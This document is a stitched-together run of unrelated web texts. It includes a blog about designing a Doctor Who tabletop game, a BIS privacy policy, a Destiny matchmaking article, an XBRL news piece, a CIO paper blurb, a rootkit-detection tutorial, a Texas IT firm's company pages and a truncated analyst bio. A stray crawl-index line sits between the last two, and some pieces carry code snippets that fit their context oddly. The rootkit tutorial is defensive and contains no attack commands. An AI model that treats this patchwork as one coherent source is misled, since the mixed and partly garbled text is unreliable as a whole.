I'm still struggling with a character system. One of the ideas I'm trying to incorporate into the game comes from some of the commentary tracks I've listened to. I forget who said it, but the idea was that people tend to overstate the differences in characterization between different regenerations of The Doctor, and that most of the actors could play "their" Doctor even with a script written for a different regeneration. The most obvious place to see this on-screen is in The Five Doctors, where Peter Davison does all of the Gallifrey political stuff that was originally supposed to be for Tom Baker. Different regenerations emphasize different aspects of The Doctor, but it's rarely a completely new personality. Sure, Colin Baker's Doctor is notably arrogant, but they're all arrogant in their own ways. I'm not sure how I want to translate that into play yet.

Right now I'm leaning toward something like Poison'd, where a character will roll one of their stats against another one of their stats to determine their result, so something like: When The Chronomaster tries to convince someone to do things his way, roll Kindness vs. Arrogance.
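To get a rough feel for how a stat-vs-stat roll like that behaves, here's a quick back-of-envelope simulation. This is purely an illustrative sketch: it assumes each stat is a pool of d6s where the highest single die wins and ties go to the acting character, which is only one of several ways the mechanic could be cashed out.

```python
import random
from collections import Counter

def opposed_roll(actor: int, resistance: int, rolls: int = 100_000) -> Counter:
    """Simulate 'roll stat vs. stat': each side rolls a pool of d6s equal
    to its rating; the highest single die wins, ties go to the actor."""
    outcomes = Counter()
    for _ in range(rolls):
        a = max(random.randint(1, 6) for _ in range(actor))
        r = max(random.randint(1, 6) for _ in range(resistance))
        outcomes["actor wins" if a >= r else "resistance wins"] += 1
    return outcomes

# e.g. Kindness 3 vs. Arrogance 2
print(opposed_roll(3, 2))
```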
I've finished a first draft of the game, tentatively called Getting There in Time. Here's the PDF: Getting There in Time rev0.1. I still want to finish a sample adventure for the supplemental materials, and I'm also a few hundred words over the limit so I'm going to work on some more edits to try to trim some fat. I'd appreciate feedback! My biggest question is: is the game playable, i.e. do you understand what I want you to do from reading the rules? Are there things I'm asking you to do that seem like they'd be unreasonably difficult? Are there pieces missing? My second biggest question is: does it feel like a Doctor Who game?
I finished the tweaks I was planning. Here's the draft I plan to submit for the contest: Getting There in Time rev 0.2.
BIS Privacy Policy Statement

The kinds of information BIS collects
Automatic Collections - BIS Web servers automatically collect the following information:
The IP address of the computer from which you visit our sites and, if available, the domain name assigned to that IP address;
The type of browser and operating system used to visit our Web sites;
The date and time of your visit;
The Internet address of the Web site from which you linked to our sites; and
The pages you visit.
In addition, when you use our search tool our affiliate, USA.gov, automatically collects information on the search terms you enter. No personally identifiable information is collected by USA.gov.
This information is collected to enable BIS to provide better service to our users. The information is used only for aggregate traffic data and not used to track individual users. For example, browser identification can help us improve the functionality and format of our Web site.
Submitted Information: BIS collects information you provide through e-mail and Web forms. We do not collect personally identifiable information (e.g., name, address, phone number, e-mail address) unless you provide it to us. In all cases, the information collected is used to respond to user inquiries or to provide services requested by our users. Any information you provide to us through one of our Web forms is removed from our Web servers within seconds thereby increasing the protection for this information.
Privacy Act System of Records: Some of the information submitted to BIS may be maintained and retrieved based upon personal identifiers (name, e-mail addresses, etc.). In instances where a Privacy Act System of Records exists, information regarding your rights under the Privacy Act is provided on the page where this information is collected.
Consent to Information Collection and Sharing: All the information users submit to BIS is done on a voluntary basis. When a user clicks the "Submit" button on any of the Web forms found on BIS's sites, they are indicating they are aware of the BIS Privacy Policy provisions and voluntarily consent to the conditions outlined therein.
How long the information is retained: We destroy the information we collect when the purpose for which it was provided has been fulfilled unless we are required to keep it longer by statute, policy, or both. For example, under BIS's records retention schedule, any information submitted to obtain an export license must be retained for seven years.
How the information is used: The information BIS collects is used for a variety of purposes (e.g., for export license applications, to respond to requests for information about our regulations and policies, and to fill orders for BIS forms). We make every effort to disclose clearly how information is used at the point where it is collected and allow our Web site user to determine whether they wish to provide the information.
Sharing with other Federal agencies: BIS may share information received from its Web sites with other Federal agencies as needed to effectively implement and enforce its export control and other authorities. For example, BIS shares export license application information with the Departments of State, Defense, and Energy as part of the interagency license review process.
In addition, if a breach of our IT security protections were to occur, the information collected by our servers and staff could be shared with appropriate law enforcement and homeland security officials.
The conditions under which the information may be made available to the public: Information we receive through our Web sites is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. For example, BIS policy is to share information which is of general interest, such as frequently asked questions about our regulations, but only after removing personal or proprietary data. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
How e-mail is handled: We use information you send us by e-mail only for the purpose for which it is submitted (e.g., to answer a question, to send information, or to process an export license application). In addition, if you do supply us with personally identifying information, it is only used to respond to your request (e.g., addressing a package to send you export control forms or booklets) or to provide a service you are requesting (e.g., e-mail notifications). Information we receive by e-mail is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
The use of "cookies": BIS does not use "persistent cookies" or tracking technology to track personally identifiable information about visitors to its Web sites.
Information Protection: Our sites have security measures in place to protect against the loss, misuse, or alteration of the information on our Web sites. We also provide Secure Socket Layer protection for user-submitted information to our Web servers via Web forms. In addition, staff is on-site and continually monitor our Web sites for possible security threats.
Links to Other Web Sites: Some of our Web pages contain links to Web sites outside of the Bureau of Industry and Security, including those of other federal agencies, state and local governments, and private organizations. Please be aware that when you follow a link to another site, you are then subject to the privacy policies of the new site.
Further Information: If you have specific questions about BIS' Web information collection and retention practices, please use the form provided.
Policy Updated: April 6th, 2015 10:00am
Bungie Details 'Destiny's' Seamless Matchmaking for Multiplayer
By Anthony Taormina

There's no denying that, given their experience with the Halo franchise, developer Bungie knows multiplayer, both cooperative and competitive. Similarly, they have quite a bit of experience with creating huge, sprawling sci-fi worlds.
It is with those two ideas in mind that we bring more news regarding Destiny, Bungie's forthcoming multiplatform, multiplayer-focused title.
While many games use a centralized server with a player limit to support multiplayer experiences, Bungie is going a different direction with Destiny. Instead, the developer is using what they are calling “mesh networking” to populate the game’s various play areas.
Using these mesh networks, players will always have companions to interact with regardless of where they are in the world of Destiny. In an ideal world, players will never encounter an area that feels empty.
“What happens is everybody in the world can play together. There aren’t these barriers that are in place. You’re all playing in one connected online world. When you’re moving from location to location you’re always going to have people to play with because there’s this huge population. You never have to go to an area of the world that’s deserted because there happens to be no one here on the server at this time.”
How Bungie plans to execute this seamless multiplayer experience isn’t entirely revealed, but, as Technical Director Chris Butcher explains, the next-gen consoles do a substantial amount of the legwork for Bungie.
“For us we’ve kind of said we want this game world to be able to work with millions of players online at once. And that means playing to the strengths of the consoles. Being able to use these very powerful machines to run a lot of the simulation. Being able to use the servers in a seamless fashion so that as you’re moving from place to place you’re switching networks with all of the different people that are around you. You’ve got a very high quality fast action gameplay experience. If you have all of these calculations taking place in a central server that’s one place in the world you can’t really have a fast action experience.”
However, although Bungie is playing to the strengths of the Xbox One and the PS4, that doesn’t mean the past-gen versions will be slouches either. As Butcher explains, Bungie has optimized the Destiny engine very well, to the point they can still generate a comparable experience on the Xbox 360 and PS3. Granted, they are using almost every ounce of those machines, but those gamers who have yet to upgrade to the next generation will be pleased to know their experience won’t be diminished.
While most of the talk regarding Destiny was focused on the game’s cooperative elements, there were also a few competitive multiplayer details revealed as well. For example, Butcher explains that although some players might be mismatched with stronger, or higher level, players, there will always be an incentive to finish a match. That might be in the form of better rewards or simple recognition that you can hold your own against higher level players.
“If you’re kind of in an underdog type of situation, then we make sure that we give you both the investment rewards, but also call out that you’re doing a really good job in this particular match. For example, when we play in the studio playtests there is always the guy that has the sniper rifle and likes to sit up high. So he’s getting a lot of kills and that’s really satisfying for you to take him down. Maybe you get three kills on him over the course of the match but it’s satisfying to you and the game rewards you for doing it because you’re an underdog in that situation.”
Ultimately, Bungie wants the competitive multiplayer matchmaking to keep things even, but if there are mis-matched opponents it’s nice to know there are still incentives to see the game through.
With one of the largest development teams on record, Destiny is poised to make a huge splash in September of this year. Yes, the game took some time to finally coalesce into something real — in fact, the game was at one point envisioned as a third-person shooter — but what Bungie settled on holds a ton of promise. But more importantly, the game is trying to push the boundaries of the multiplayer experience – to give players something that, if it works, will be practically seamless. We can't wait for the beta, which hits Sony platforms first.
What do you think of Bungie’s approach to matchmaking in Destiny? Do you have any concerns?
Destiny releases September 9, 2014 for the PS3, PS4, Xbox 360, and Xbox One.
Source: Game Informer
Tags: Activision, Bungie, Destiny, PS3, PS4, Xbox 360, Xbox One

Game Title: Destiny
Platforms: PS3, PS4, Xbox 360, Xbox One
Publisher: Activision
Developer: Bungie
Release: Sep 09, 2014
New language transforms business reporting
"It's about better, faster and cheaper business reporting," says Olivier Servais, director of the IST project XBRL Europe. "This was once done with proprietary electronic formats. XBRL (eXtensible Business Reporting Language) is an open standard that brings a common understanding, vocabulary and method to financial statements."
Unlike Hypertext Markup Language (HTML), eXtensible Markup Language (XML) neither defines nor limits tags. XBRL is part of the XML family and focuses on business reporting needs, by flagging up everything from net assets to sales. Computers can read these tags, speeding up the preparation, analysis and communication of business information.
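To make the idea concrete, here is a rough sketch of what a tagged fact looks like and how a program reads it. This is a simplified, made-up example rather than a schema-valid XBRL filing; real instance documents also declare contexts, units and taxonomy schemas, and the element names below are invented for illustration.

```python
import xml.etree.ElementTree as ET

# Loosely modelled on an XBRL instance document: each element name
# identifies a business concept, and attributes give period and currency.
snippet = """
<report xmlns:ex="http://example.org/xbrl-demo">
  <ex:NetAssets contextRef="FY2006" unitRef="EUR" decimals="0">1500000</ex:NetAssets>
  <ex:Sales contextRef="FY2006" unitRef="EUR" decimals="0">9800000</ex:Sales>
</report>
"""

root = ET.fromstring(snippet)
for fact in root:
    concept = fact.tag.split("}")[1]  # strip the namespace, e.g. "NetAssets"
    print(f"{concept}: {fact.text} {fact.get('unitRef')} ({fact.get('contextRef')})")
```

Because the tags carry their own meaning, the same statement can be compared and analysed by software without anyone rekeying the figures.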
External reports are only the iceberg's visible tip. XBRL will soon be used widely for internal company reports, which make up the bulk of business reporting. Within five years it will also be common in the credit risk arena, enabling banks to do away with the manual inputting of customers' financial details.
The language originated in the United States when an accountant began tagging data to facilitate the exchange, comparison and analysis of financial reports. The idea quickly caught on, supported by influential bodies such as the American Institute of Certified Public Accountants. "However," adds Servais, "since our 2004 project launch, the world has largely viewed XBRL as European, because of the numerous first-class XBRL projects here."
The two-year project sought to accelerate the use of XBRL, by increasing awareness and creating user groups. These goals were timely, given the European Union's emerging focus on competitiveness, growth and transparency � not to mention recent worldwide adoption of the International Financial Reporting Standards (IFRS). Indeed, according to Servais, "IFRS and XBRL make a sort of dream team!"
Driven by the project's activities, the language is today widely adopted in Europe with at least one project in each EU Member State. The United Kingdom's Inland Revenue, for example, accepts tax filings in XBRL. All Spanish public companies must now use it when filing with authorities and Belgian companies will follow suit from 2007.
The project organised 120 events across Europe to show how the format can improve people's way of working. Of the 5,000 attendees, several were high-level regulators and national ministers, notes Servais.
He also highlights the creation of national working parties or 'jurisdictions' in eight European countries. Designed to reinforce XBRL use, they bring together public bodies and commercial companies and are led by a neutral, independent party such as a central bank. "This neutrality is important and was a major reason why the European Commission agreed to fund us," he adds.
Early in the project, the partners built contact databases, an intranet and the website. These tools and the newsletter, now distributed to 3,500 people in Europe, strengthened the profile of XBRL. Though the project has ended, the website and newsletter will live on with jurisdiction funding.
Looking ahead, Servais expects most business vendors to have adopted XBRL by the decade's end. He also believes the term will eventually disappear: "It will probably just be called business reporting, when everyone uses it."
XBRL, a worldwide initiative, is being driven to a large extent by Europe. A new organisation known as XBRL Europe, registered in Belgium and part of the umbrella worldwide body XBRL International, will continue the project's work. "Most people have now heard of XBRL," says Servais, "so we'll concentrate on its adoption and implementation, especially by organising training workshops throughout Europe."
Olivier Servais
Director, XBRL Europe
Tel: +32-2-7026482
Source: Based on information from XBRL
The Top 3 Cost-Cutting Mistakes CIOs Make And How to Avoid Them
The current economic downturn has resulted in contraction of IT Department budgets and a mandate to allocate resources to only the most critical projects, then execute flawlessly.
This paper outlines some bad, but not uncommon tactical reactions to falling budgets, and describes problems those reactions generate. It also recommends a proven alternative for delivering more value with smaller budgets using an Agile and Lean framework that avoids costly project failures, maximizes ROI of projects undertaken, and lets you have a more adaptable and flexible portfolio of projects.
Evan Campbell
Vice President of Professional Services, Rally Software Development With more than 15 years in the software industry, Evan Campbell has had responsibility for Agile transformations from the team level to the boardroom. Prior to joining Rally, he served as Chief Technology Officer and Vice President of Professional Services at SolutionsIQ, a 450-person IT consulting company. In that role, he was responsible for building and leading the company's Agile Software Development Practice, and it's Agile Consulting Practice, among others. As CTO of Versatile Mobile Systems (VMS), a publicly traded software company, he
was responsible for Product Development, Professional Services, and IT. Evan joined VMS as a result of its acquisition of Mobiquity, an e-commerce SaaS company where he was Co-Founder and CTO. Prior to these roles in software companies Evan worked in Corporate IT leading development teams and managing software development and systems integration projects. Evan is a Certified ScrumMaster (CSM) and a Certified Information Systems Auditor (CISA). He holds an MBA from Rollins College and an MA in International Affairs, Economics and Finance from George Washington University. Prior to his career in technology, Evan served in the U.S. Army as an Airborne Ranger and Green Beret.
Vendor: Rally Software
How to discover hidden rootkits
Unearth and remove rootkits using BitDefender's RescueDisk
Once upon a time, viruses were about chaos, destruction and loss of data, but that was before criminal gangs realised that computers could be used to extort and defraud, and could even be used as cyber weapons. For the past decade or so, online crime has continued to evolve faster than the industry that has sprung up to protect us from it. Malware of all kinds is becoming stealthier as the rewards become more lucrative, and today even the most basic botnet client can cover itself in a shroud of invisibility. So how do you detect such an infection and give your network a clean bill of health? This requires deep scanning - far deeper than your normal antivirus software can provide.

Rooting around

The name 'rootkit' derives from 'root', which is the system administrator's account name on UNIX and Linux-based operating systems, and 'kit', simply meaning a toolkit. Therefore, a rootkit is a toolkit designed to give privileged access to a computer.

To understand rootkits properly, it's necessary to see an operating system as a series of concentric security rings. At the centre is the kernel; this is usually called ring zero, and has the highest level of privilege over the operating system and the information it processes. Ring zero is also often referred to as kernel mode. Rings one and two are usually reserved for less privileged processes. If these rings fail, they will only affect any ring three processes that rely on them. Ring three is where user processes reside, and is usually referred to as user mode. Ring three is always subject to a strict hierarchy of privileges. It's interesting to note, however, that debuggers usually run in ring two because they need to be able to pause and inspect the state of user mode processes.

Importantly, a process running in a higher privileged ring is able to lower its privileges and run in an outer ring, but this can't work the other way around without the explicit consent of the operating system's security mechanisms. This is known as the principle of least privilege. In cases where such security mechanisms can be avoided, a privilege escalation vulnerability is said to exist.

Ring zero (kernel mode) processes, along with the modules that make them up, are responsible for managing the system's resources, CPU, I/O, and modules such as low-level device drivers. Many rootkits are therefore designed to resemble device drivers or other kernel modules. If you want to spy on a computer, or intercept and modify data that doesn't belong to you, the kernel is the place to be. If you want to see everything that's typed into a keyboard, a rootkit that masquerades as the keyboard driver is what you need. To see everything sent to and from the network, a network card driver is the thing to replace.

Protection

If kernels were simply lumps of code that were compiled by the developer and then never changed until another was released, rootkits would be easier to detect. However, modern operating systems are extensible; they can take advantage of optionally loadable modules. At system bootup, a typical operating system might scan the hardware and only load the modules it needs in order to control that hardware. These modules are therefore very lucrative targets for malicious code writers. If a module can be replaced with one containing a rootkit, it will then be loaded into the kernel and will run in ring zero. To prevent poisoned kernel code from being loaded in 64-bit Windows 7, Microsoft now insists on cryptographic code signing for all loadable modules.
A 'hash value' is generated for the module by running its code through an algorithm. Only if the code produces the same hash value as the original code compiled by Microsoft is it loaded and run. Any deviation from the hash value means that the code must have been modified and therefore will not load. However, because some older hardware still uses device drivers that don't support signing (as does some custom hardware), it is possible to bypass device driver signing by pressing [F8] at boot time and selecting the option on the boot menu to disable it.

When installing programs in Windows, the user access control prompt that appears is also a potential infection vector. Once you say 'Yes', you're giving privileged access to the operating system - but do you always know what you're installing? If a hacker can convince you to click 'Yes' when you should be saying 'No', your antivirus software can't always save you. This is why it's dangerous to simply install software because a friend sends it to you, and why installing cracked, pirated versions of software can be extremely dangerous.

Flexible malware

Today, rootkits are an epidemic. As malware, their purpose is not usually directly malicious, but instead they are used to hide malicious code from your operating system and your defences. Being so flexible, rootkits find many uses. For example, rootkits can be used to create and open back doors to operating systems for privileged access, either by command line or via a GUI. Such access allows a potential attacker to browse, steal and modify information at will by subverting and even bypassing existing account authorisation mechanisms. If a rootkit stays on a PC after reboot, it will also allow hackers back into that system with privileged access at a later date.

To prevent discovery, once running, rootkits can also actively cloak their presence. How they do this is quite ingenious. Programs such as the Windows Task Manager or Microsoft's alternative Process Explorer both need access to the operating system to report on what's happening. They are user processes, running in ring three with no direct access to the kernel's activities. Instead, they request information via authorised function calls. However, if a rootkit has replaced the part of the kernel servicing those calls, it can return all the information the system monitor wants - except for anything relating to the rootkit. Antivirus programs also use standard system calls, and this is why they are very poor at detecting rootkits on a running system.

This ability to operate invisibly within the OS means that a major use of rootkits is to conceal other malware, which might in turn run in the outer rings of operating systems. Some rootkits can even disable antivirus software. It's not unusual to find a highly sophisticated rootkit protecting a fairly simple piece of malware. So, how can they be discovered?

Detection time

Because a rootkit can actively defend against detection on a running operating system, the only way to be sure that it's not doing so is to prevent it from running. The best way of doing this is to shut down the operating system itself and examine the disk upon which it is installed. Though this is specialised work, many antivirus vendors have woken up to the need for such tools, and now supply them free of charge. We're going to use BitDefender's free RescueDisk, which is supplied as a bootable ISO image ready to be burned onto a bootable DVD.
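Incidentally, the hash comparison described above is easy to demonstrate, and the same idea is worth applying to the RescueDisk image itself before you burn it: compare the downloaded file's digest against the checksum the vendor publishes. A minimal sketch follows; the expected digest below is a placeholder, not BitDefender's real checksum.

```python
import hashlib

def file_digest(path: str) -> str:
    """Hash a file in chunks; any modification to the contents produces a
    completely different digest, which is what the loader checks for
    signed drivers."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

EXPECTED = "0" * 64  # placeholder: substitute the vendor's published checksum
actual = file_digest("BitDefenderRescue CD_v2.0.0_5_10_2010.iso")
print("OK to burn" if actual == EXPECTED else "Digest mismatch - do not use!")
```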
Based on Linux, this boots in place of the computer's operating system and scans the hard disk without any rootkit activity getting in the way. You can download BitDefender's RescueDisk from http://bit.ly/coqNmL. Click the 'BitDefenderRescue CD_v2.0.0_5_10_2010.iso' file to download it, then burn to a DVD. Once this is done, place the DVD in the drive and reboot the computer. After a few seconds, the BitDefender boot menu will appear. Press [Enter], and after a few minutes a graphical desktop will load. BitDefender's software runs automatically from here. Click 'Continue' to start and the software will download and install the latest updates.

BitDefender then sets to work examining the disk. The software will run for 15 minutes or more depending on the size of your disk. It scans not only the operating system files but also the boot loader and other files, looking for signs of infection. Provided that any rootkits are listed in the downloaded definition files, this should identify any stealth malware it encounters - including the malware that the rootkit was shielding.

Note that as it runs, BitDefender will refer to the C: drive as /media/LocalDisk-0. This is a convention in Linux and refers to the fact that the software mounts the system disk as it would any other storage device. Once you have completed the scan and (hopefully) found nothing, you can switch the system off and on again, remove the disk and boot into Windows.

Within Windows

Though it's harder to determine whether a running Windows system is infected with a rootkit, it can be done. One solution to this problem is the free utility GMER, which you can download from www.gmer.net. To do so, click 'Files' and then the 'Download EXE' button. This randomises the filename. In theory, any lurking rootkit might be ready to block the GMER executable, but if the filename is random, it will be harder for this to happen. You'll then download a zip file, which Windows Explorer should be able to open. Drag and drop the GMER.exe file to a convenient directory (a USB memory stick is a good option) and then double click it to run.

Click 'Scan' and GMER will scan the list of ticked OS items in the right-hand column. This can take a while, but don't be concerned about the long list that appears unless you see something red, which indicates a possible infection. As it scans, GMER also produces information about the running system. To see this information, click the tab marked '> > >'. This opens up several other tabs with the various types of information. Perhaps the most useful of these is the Processes tab.

As with other forms of malware, the success of rootkit detection depends on the technology used and the definitions provided by the security vendor, but this isn't always 100 per cent effective. It's therefore highly recommended that you scan your system using the free rescue disks provided by more than one vendor, as a mix of technologies and scanning methods is much more likely to detect rootkits.
Residential Service

cat-man-du meets the needs of residential clients as well as business-oriented clients. Along with the latest tech news, you can find all the residential services you are looking for on our PC site.

cat-man-du is the most awarded business tech company in the Texas Panhandle. Providing services ranging from complete workstation development to total network and server deployment, cat-man-du can handle any of your needs: the most awarded and best computer service and business IT in Amarillo, Canyon and Dumas.
It is the mission of cat-man-du to provide the highest possible levels of customer service and marketplace ethics while building long lasting relationships with our clients. In addition, we strive to earn a modest profit while giving back and supporting not only the communities that we serve but the world that we live in as well.
cat-man-du recruits staff members who are at the top of their game, not only with regards to their technical skills but with interpersonal skills as well. These top-notch team members accomplish our mission by keeping their technical skills honed as well as their relational and customer service skills refined.
To Our Team Members
We strive to provide our Employees (we prefer to call them Team Members and/or Partners) with a fun and stable work environment focused on equal opportunity and a commitment to growth and fulfilment. cat-man-du was founded to be the vehicle that allows our Partners to realize their own dreams and goals. We hire Team Members who are passionate, creative, innovative and goal minded. Above all, Partners are given the same respect, and serving attitude that they are expected to share with our valuable clients. We create a culture of excellence, teamwork, fun coupled with a commitment to one of our mottos:
"Do what you say you're going to do, when you say you're going to do it."
To join the cat-man-du team, visit our career center and upload a resume.
cat-man-du believes we must put our clients' needs first, operate morally and ethically in every situation and be dedicated to providing the best customer experience possible. We will deliver our high-quality skills to our clients in a timely and professional manner and earn a fair profit doing so.
The customer is the reason we exist. We will always provide the best customer service, technical support and business relationships available anywhere.
As a team, we are committed to our clients and to our primary motto: "Everything Matters."
Founder, Acting President/CEO and Board Chairman
As President and CEO of cat-man-du Corporation, Ray Wilson leads the largest and most awarded computer service and IT support company in West Texas. Ray brings over 25 years of business leadership and management to the table, with more than 15 years of that time in IT management. Ray has been recognized and awarded by the Amarillo Chamber of Commerce, the BBB, the Amarillo Young Professionals and the Amarillo Independent School District. Ray has also served on the Board of Directors for the Amarillo Chamber of Commerce and the Don Harrington Discovery Center. Ray has a heart for giving and actively supports many charities worldwide. Ray is also a professional musician who has sold his music worldwide.
Amber Wilson
Amber is the Chief Financial Officer of cat-man-du Corporation, a position she has held since 2004. She is responsible for all financial matters for cat-man-du, including Accounting, Internal Audit and Controls, Tax, Treasury and Asset Management. Amber earned her Associate's degree in Business Administration from Amarillo College in 2003 and her Bachelor of Business Administration (BBA) in Accounting from West Texas A&M University in 2006.
Tony Martin
Executive Vice President, Operations and Regional Supply Chain
Tony is the VP of the daily operations and supply chain management for West Texas. In this role, Tony supports the mission and strategies that are determined by the Board of Directors and the Executive Officers of cat-man-du Corporation. cat-man-du Corporation's Supply Chain is responsible for purchasing millions of dollars' worth of inventory and specific client orders, as well as procurement of company supplies and assets. Additionally, Tony's role over operations sees him providing oversight to the West Texas region while he ensures that quality and safety systems are in place, that cat-man-du Corporation policy is adhered to, and that each location is in compliance with state and federal laws.
cat-man-du Corporation is the most awarded computer sales, computer service, and business IT company in West Texas.
Over the years cat-man-du has had the honor of working with thousands of businesses and residents in West Texas, Eastern New Mexico, Oklahoma, Kansas and the DFW area from our three locations in Amarillo, Canyon, and Dumas, Texas. With a true desire to solve computer and technology-related problems, cat-man-du has become the leader in the Texas Panhandle and beyond when it comes to Information Technology.
cat-man-du Corporation has received the following honors, awards and recognition:
2012 Winner Top Small Business - Amarillo Chamber of Commerce
2010 Winner, Better Business Bureau of the Texas Panhandle's Torch Awards for Marketplace Ethics - Better Business Bureau of the Texas Panhandle
2009 Top 20 Under 40 - Amarillo Chamber of Commerce and the Amarillo YP *Ray Wilson awarded
2009 Finalist, Better Business Bureau of Amarillo's Torch Awards for Marketplace Ethics - Better Business Bureau of Amarillo
2009 Jim Henson Top Small Business of the Year - Amarillo Chamber Of Commerce
2007 Heart For Kids Award - Amarillo Independent School District/AACAL
2006 Finalist, Better Business Bureau of Amarillo's Torch Awards for Marketplace Ethics - Better Business Bureau of Amarillo
ENVIRONMENTAL RESPONSIBILITY & SUSTAINABILITY
At cat-man-du we believe that it has become an essential requirement of doing business responsibly and successfully to pay attention to the impact that we have on our environment and on future generations. As West Texas's largest computer and technology retailer, our actions have the potential to create a better world for generations to come. To accomplish this goal, in 2008 we created cat-man-du Green.
What is cat-man-du Green?
cat-man-du Green is the asset recovery division of catmandu, Inc. This division handles the collection and recycling of electronic hardware waste or e-waste produced by cat-man-du, our partners as well as our competitors.
Why spend so much corporate money and energy with cat-man-du Green?
To protect our air, ground, and water supplies and help ensure a future for our children.
A study by the United States Environmental Protection Agency (EPA) has shown that electronics already make up approximately two percent of the municipal solid waste stream, and research indicates that electronic waste is growing at three times the rate of other municipal waste.
In 2011, the US alone generated 3.41 million tons of e-waste. Of this amount, only 850,000 tons, or 24.9%, were recycled, according to the EPA (up from 19.6% in 2010). The rest was trashed - in landfills or incinerators.
Electronic circuit boards and batteries can contain hazardous materials, such as lead, mercury and hexavalent chromium. If improperly handled or discarded, these toxins can be released into the environment through landfill leachate or incinerator ash.
What does cat-man-du Green do with e-waste?
cat-man-du Green exercises a zero-landfill policy and abides by the Electronics Recycler's Pledge of True Stewardship. Hardware that has not yet passed its useful end-of-life will be used to build computers that can be sold at a reduced price. These sales help offset the expenses that the company incurs through our "green" efforts. Hardware that has already passed its useful end-of-life will be broken down to base components and shipped to our recycling partners.
Who are cat-man-du's partners?
We currently work with CRC Recycling to make sure that every aspect of the equipment disposal is handled properly.
How can I dispose of my hardware and how much does it cost?
Cost to you: zero. Just bring us the hardware.
Contact us today for more details!
cat-man-du FAQ
Where did the name cat-man-du come from?
Our company founder, Ray Wilson, was driving between Amarillo and Dumas one day while performing computer services as a side business when he decided to start the company. He was searching for a name that would both set the company apart from the many competitors and describe the type of company he wanted to create.
A 1975 Bob Seger song called "Katmandu" came on the radio; it describes someone who doesn't feel loved where he is and wants to go someplace better. Because Ray had been in the technical industry for so long, he knew that most customers were unhappy with the service they received from computer repair companies and IT companies, but that they just didn't know of any other alternative. It also dawned on him that he could take three commands used in the Linux OS (cat, man and du) and phonetically pay homage to the Bob Seger song.
He went home that night and created the company logo and name. According to Ray "The name is a pinch of fun, a dash of nerdy and a whole lot of Rock 'n' Roll on a serving platter that puts our clients first and gives them a place to go and receive the service they deserve but can't get at our competitors."
Is cat-man-du a "local" company?
catmandu, Inc. or cat-man-du Corporation is a privately held Texas "C corporation" founded and based in Randall County, Texas, headquartered in Amarillo, Texas. cat-man-du currently has three locations in Amarillo, Canyon and Dumas, Texas and serves West Texas as well as Eastern New Mexico, Oklahoma, Kansas and the DFW area.
Does cat-man-du perform computer service for individuals, IT support for business, new computer sales or all three?
In short, all three and more. cat-man-du is staffed with some of the most experienced computer technicians and IT administrators within an 800-mile radius. Our business model is based on building lasting relationships with clients through amazing customer service and dedication to their technology, whether it is their home computer and network or a complex business network with multiple servers and hundreds of computer workstations. In order to accomplish this goal we have staffed our locations with technicians and customer support team members that are highly trained in all forms of computer repair and service as well as business IT. In addition, to maintain our business relationships and achieve our company goals, we sell new PCs, tablets, networking equipment, business workstations and servers. The challenge was to find a partner whose brand we could proudly place side by side with our own. To meet this challenge we partnered with the number one PC manufacturer in the world, which also has the lowest failure rate coupled with outstanding product support. That company is Lenovo. In addition to being an authorized Lenovo reseller, cat-man-du is also the only authorized Lenovo service center in West Texas. In addition to partnering with Lenovo, cat-man-du has also partnered with Google in order to offer their Nexus line of tablets and smartphones.
Does cat-man-du offer design, web development, and SEO services?
Yes. cat-man-du can design your entire brand from the ground up. If you need logo design services, full web development, or Search Engine Optimization (SEO) services for an existing site, cat-man-du can help. We also specialize in Drupal CMS (Content Management System) development. We can even help you get your company listed in Google Places, Bing Places, and other search databases, which will help your prospective clients find you. If you are in need of any of our design and development services you can visit the cat-man-du Digital Marketing Division here.
Is cat-man-du HIPAA Compliant?
Yes. HIPAA privacy rules provide cat-man-du and its technicians with "business associate" rights to limited use and disclosure of the information. cat-man-du never discloses data unless required by law. cat-man-du does not access any portion of the backup data unless authorized for customer support purposes. cat-man-du can be fully prevented from data access by use of the client-side secret encryption key.
HIPAA compliant information systems require a combination of administrative procedures, physical safeguards and technical measures to protect patient information during storage and transmission across communication networks. As a significant part of your overall contingency plan, cat-man-du provides secure, automated data transmission and storage services for data backup and recovery.
cat-man-du implements the following HIPAA compliant features:
- Data security: Microsoft EFS encryption - data is ALWAYS compressed and encrypted during transmission and storage
- Data integrity controls with mutual authentication
- Restricted password access - a secret encryption key can be specified for ultimate security (see the sketch after this list)
- Off-site storage at secured data servers (DataHealth)
- Extended storage is available at an additional cost per year (HIPAA requires storage for minimum 6 years)
- Optional monthly CD or DVD archives are available
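To make the client-side secret encryption key idea concrete, here is a minimal Python sketch of the general technique: the file is encrypted with a key that only the client holds before it ever leaves the machine, so whoever stores the backup sees only ciphertext. This is a generic illustration using the third-party cryptography package, not the mechanism named above (the feature list refers to Microsoft EFS), and the filenames are hypothetical.

```python
from cryptography.fernet import Fernet

def encrypt_backup(plain_path: str, cipher_path: str, key: bytes) -> None:
    """Encrypt a file with a client-held key before it is uploaded.

    The storage provider only ever receives cipher_path, which is
    unreadable without the key kept on the client machine.
    """
    fernet = Fernet(key)
    with open(plain_path, "rb") as f:
        ciphertext = fernet.encrypt(f.read())
    with open(cipher_path, "wb") as f:
        f.write(ciphertext)

# One-time key generation; losing this key means losing access to
# every backup encrypted with it, which is the point of the design.
key = Fernet.generate_key()
encrypt_backup("records.db", "records.db.enc", key)
```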
Amarillo's Best Computer Repair, Business IT, Digital Marketing, and Web Development Company
Contact Us Today For A Quote!
806-350-TECH | 计算机 |
2015-48/3674/en_head.json.gz/14737 | Patti Freeman Evans, Vice President, Research Director serving eBusiness & Channel Strategy Professionals
Blog:
eBusiness & Channel Strategy Blog
Patti serves eBusiness & Channel Strategy Professionals. She is a leading expert on multichannel retail strategy with 19 years of diversified experience, expertise in creating customer-centric eCommerce sites, integrating channels effectively, developing innovative marketing initiatives, and ensuring high-standard customer service and order fulfillment operations.
Previous Work Experience
